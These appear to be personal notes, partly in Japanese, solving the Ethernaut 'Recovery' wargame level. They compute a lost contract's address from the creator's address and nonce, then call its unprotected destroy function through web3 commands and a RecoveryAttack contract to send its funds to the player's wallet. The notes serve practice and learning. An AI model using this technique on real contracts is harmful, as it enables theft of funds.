Ethernaut-solution 17. Recovery



17. Recovery


//is gonna give you the smart contract address that you're looking for so

//this is all computed deterministically

address = rightmost_20_bytes(keccak(RLP(sender address, nonce)))

//nonce creates or generated this simple token contract and we're passing it to the rlp encoding function


//secret addressを抜粋してみる

>web3.utils.soliditySha3("0xd6","0x94","0x0A4a5914d6a3F59863639EdE0b3d8f5B6E8c9473","0x01") //rlp,rlp, sender address, nonce
'0xa01cfea9bdb7e3e4b516448a200e3409bef9910e02454a6a70f04bd8ac6acc4e' //40digits(20bits) is our contracts address from right side 
this is the simpleToken address (secret address)


//secret address (EtherScanで確認済み)


*anything beginning with “0x” simply means the value is in hexadecimal format.

//encode a function call to the destroy function. Its going to pass my players address"_to"

>data = web3.eth.abi.encodeFunctionCall ({
	name: 'destroy',
	type: 'function',
	inputs: [{
		type: 'address',
		name: '_to'
}, [player]);



>await web3.eth.sendTransaction ({
	to: "", //<insert the address of the lost contract>
	from: player,
	data: data
})//Deploy on Remix 

[block:10931562 txIndex:2]from: 0xF6e...f30F5to: RecoveryAttack.(constructor)value: 0 weidata: 0x608...f0033logs: 0hash: 0x632...16e03

//copy the secret address into attack

[block:10931570 txIndex:8]from: 0xF6e...f30F5to: RecoveryAttack.attack(address) 0x51F...D4AEAvalue: 0 weidata: 0xd01...acc4elogs: 0hash: 0x34d...e45b1

//check secret address all funds into my wallet!!